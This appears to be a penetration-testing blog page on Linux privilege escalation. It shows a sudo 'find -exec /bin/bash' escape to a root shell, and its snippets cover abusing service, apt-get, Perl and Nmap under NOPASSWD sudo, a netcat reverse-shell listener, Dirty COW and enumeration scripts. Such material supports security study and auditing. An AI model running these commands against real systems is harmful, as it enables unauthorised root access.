The find Linux command can help us escape from a restricted shell if you get to run the program with higher privileges, such as through a NOPASSWD entry in /etc/sudoers. How to 1. sudo -l 2. sudo find . -exec /bin/bash \;
Search Results
service – Privilege Escalation
Sudo (NOPASSWD) service - Privilege Escalation If you ever get to run the “service” command with root privileges, you can escape from a restricted shell to root. In this example /etc/sudoers has allowed a user to run this program as root without needing a password. How to 1....
apt-get – Privilege escalation
apt-get - Privilege escalation apt-get can be used to escalate privileges when sudo is allowed without password. How to 1. check the permissions this user has sudo -l We can see that /usr/bin/apt-get is allowed (NOPASSWD) 2. get into changelog documentation sudo...
linux-exploit-suggester – Enumeration Linux kernel/Linux-based machine
LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine. https://github.com/mzet-/linux-exploit-suggester Execute 1. Download the tool git clone https://github.com/mzet-/linux-exploit-suggester.git cd ls 2. Start...
LinEnum – Linux config enumeration
The art of privilege escalation is a skill that any competent hacker should possess. It's an entire field unto itself, and while it's good to know how to perform the techniques involved manually, it's often more efficient to have a script automate the process. LinEnum...
Linux config enumeration – linuxprivchecker
This script is intended to be executed locally on a Linux box to enumerate basic system info and search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text passwords and applicable exploits....
Linux config enumeration – unix-privesc-check
Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps...
(CVE-2016-5195) [Privilege Escalation] – Dirtycow - ‘PTRACE_POKEDATA’ Race Condition
Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka...
Perl – privilege escalation
Using Perl to elevate privileges using a reverse shell. Exploit 1. Check sudo permissions sudo -l 2. Start a listener on Kali/Parrot nc -lvnp 4445 3. Run perl using sudo, as no password is required. sudo /usr/bin/perl -e 'use...
Nmap – privilege escalation
Nmap is a scanner for network and OS services detection. However, if it is misconfigured to run with “sudo” or “administrator” privileges, it can lead to privilege escalation. Exploit 1 1. Check what sudo permission the current user has, desired “NOPASSWD” sudo -l 2....